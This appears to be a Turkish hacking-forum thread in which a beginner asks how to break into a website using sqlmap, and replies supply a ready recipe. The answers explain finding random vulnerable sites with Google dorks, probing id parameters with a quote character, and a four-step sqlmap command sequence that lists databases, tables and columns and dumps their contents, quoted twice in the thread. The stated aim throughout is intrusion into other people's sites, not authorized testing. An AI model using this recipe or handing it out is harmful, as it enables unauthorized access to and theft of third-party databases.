SQLMAP ile nasıl siteye sızabilirim ?

efebro38

efebro38

Üye
27 Haz 2019
83
6
Merhaba arkadaşlar kali linuxu yeni yükledim sqlmap ile bir siteye arama yapmak istiyorum. Formda çokca konu var fakat 0 dan basit şekilde anlatırsanız sevinirim.
Bildiğiniz sql açıklı bir site ve nasıl sızacağımı anlatır mısınız ? İyi günler.
 
Çözüm
Safak-Bey
Merhabalar;
SQL açığı için eğer bir hedef siteniz var ise Acunetix, Zaproxy, Safe3, SkipFish gibi zafiyet tarayıcı programlar ile sql açığını keşfedebilir veya hedefiniz yoksa google de inurl:article.php?id= , inurl:news.php?id= gibi dorkları aratarak çıkan sitelerde url' deki id değerinin sonuna ' (tırnak) işareti koyarak tespit edebilirsiniz(örn:.php?id=2'). Eğer SQL açığı var ise site "SQL syntax;" veya sitedeki içeriklerin silinmesi gibi çeşitli hatalar vericektir.

SQLMAP Kullanımı;
Diyelim ki sql açığı olan bir site bulduk databaseyi nasıl çekicez? aşağıdaki basit sqlmap komutları ile sitenin databasesi...
Tarihe göre sırala Oylara göre sırala
MuhammedTr768

MuhammedTr768

Kıdemli Üye
7 Kas 2021
2,933
1,815
31
MyKrallife
efebro38' Alıntı:
Merhaba arkadaşlar kali linuxu yeni yükledim sqlmap ile bir siteye arama yapmak istiyorum. Formda çokca konu var fakat 0 dan basit şekilde anlatırsanız sevinirim.
Bildiğiniz sql açıklı bir site ve nasıl sızacağımı anlatır mısınız ? İyi günler.
Genişletmek için tıkla ...
Merhaba,

Sqlmap ile açık taraması değil, açıktan yararlanma yapabilirsiniz. Açık bulmak için Google dorklari ile site bulup id=(sayı) kısmına ' veya " ekleyeceksiniz. Hata veriyorsa SQL açığı var demektir. Çözüm olarak işaretlerseniz sevinirim.
 
Oyla 0 Downvote
Safak-Bey

Safak-Bey

Uzman üye
9 Ara 2021
1,795
1,987
Gereken Yerde
Merhabalar;
SQL açığı için eğer bir hedef siteniz var ise Acunetix, Zaproxy, Safe3, SkipFish gibi zafiyet tarayıcı programlar ile sql açığını keşfedebilir veya hedefiniz yoksa google de inurl:article.php?id= , inurl:news.php?id= gibi dorkları aratarak çıkan sitelerde url' deki id değerinin sonuna ' (tırnak) işareti koyarak tespit edebilirsiniz(örn:.php?id=2'). Eğer SQL açığı var ise site "SQL syntax;" veya sitedeki içeriklerin silinmesi gibi çeşitli hatalar vericektir.

SQLMAP Kullanımı;
Diyelim ki sql açığı olan bir site bulduk databaseyi nasıl çekicez? aşağıdaki basit sqlmap komutları ile sitenin databasesi çekilebilir;
sqlmap -u "http ://aciklisite.com/index.php?id=1" --dbs --batch
sqlmap -u "http ://aciklisite.com/index.php?id=1" -D db_adi --tables --batch
sqlmap -u "http ://aciklisite.com/index.php?id=1" -D db_adi -T tablo_adi --columns --batch
sqlmap -u "http ://aciklisite.com/index.php?id=1" -D db_adi -T tablo_adi -C kolon_adi/adlari --dump --batch

İyi Forumlar...
 
Son düzenleme:
Oyla 0 Downvote
Çözüm
efebro38

efebro38

Üye
27 Haz 2019
83
6
Safak-Bey' Alıntı:
Merhabalar;
SQL açığı için eğer bir hedef siteniz var ise Acunetix, Zaproxy, Safe3, SkipFish gibi zafiyet tarayıcı programlar ile sql açığını keşfedebilir veya hedefiniz yoksa google de inurl:article.php?id= , inurl:news.php?id= gibi dorkları aratarak çıkan sitelerde url' deki id değerinin sonuna ' (tırnak) işareti koyarak tespit edebilirsiniz(örn:.php?id=2'). Eğer SQL açığı var ise site "SQL syntax;" veya sitedeki içeriklerin silinmesi gibi çeşitli hatalar vericektir.

SQLMAP Kullanımı;
Diyelim ki sql açığı olan bir site bulduk databaseyi nasıl çekicez? aşağıdaki basit sqlmap komutları ile sitenin databasesi çekilebilir;
sqlmap -u "http ://aciklisite.com/index.php?id=1" --dbs --batch
sqlmap -u "http ://aciklisite.com/index.php?id=1" -D db_adi --tables --batch
sqlmap -u "http ://aciklisite.com/index.php?id=1" -D db_adi -T tablo_adi --columns --batch
sqlmap -u "http ://aciklisite.com/index.php?id=1" -D db_adi -T tablo_adi -C kolon_adi/adlari --dump --batch

İyi Forumlar...
Genişletmek için tıkla ...
Teşekkür ettim tam istediğim şekilde bi anlatım olmuş kısa ve öz iyi formlar .
 
Oyla 0 Downvote
T

'The Wolf

Kıdemli Üye
22 Nis 2021
4,043
2,565
Tanrı dağı
Sqlmappentester' Alıntı:
nMap dedim Havijle Vur dedim benimki demek açıklayıcı olmamış valla gülünecek tiplersiniz Ne Diyim
Genişletmek için tıkla ...
En iyi, açıklayıcı, öğretici cevabı kim verirse onu çözüldü olarak işaretler. Ayrıca
sırf seninkini işaretlemedi diye "" valla gülünecek tiplersiniz Ne Diyim "" demende doğru değil buna ne sen
nede ben karışabiliriz.
 
Oyla 0 Downvote
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.